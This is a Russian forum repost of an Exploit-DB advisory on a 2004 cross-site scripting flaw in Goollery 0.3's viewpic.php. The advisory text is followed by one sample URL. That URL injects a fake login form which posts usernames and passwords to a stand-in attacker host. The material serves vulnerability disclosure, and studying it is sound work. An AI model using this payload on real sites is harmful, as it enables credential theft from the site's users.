Exploit Goolery 0.3 - 'viewpic.php?conversation_id' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24718
Проверка EDB
  1. Пройдено
Автор
LOSTMON
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-2246
Дата публикации
2004-11-02
Goolery 0.3 - 'viewpic.php?conversation_id' Cross-Site Scripting
Код:
source: https://www.securityfocus.com/bid/11587/info

It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. 

These problems present themselves when malicious HTML and script code is sent to the application through the 'page' parameter of several scripts. 

These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user.

http://www.example.com/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=<form%20action="http://www.atacker.com/save2db.asp"%20method="post">Username:<input%20na
me="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login
"></form>
 
Источник
www.exploit-db.com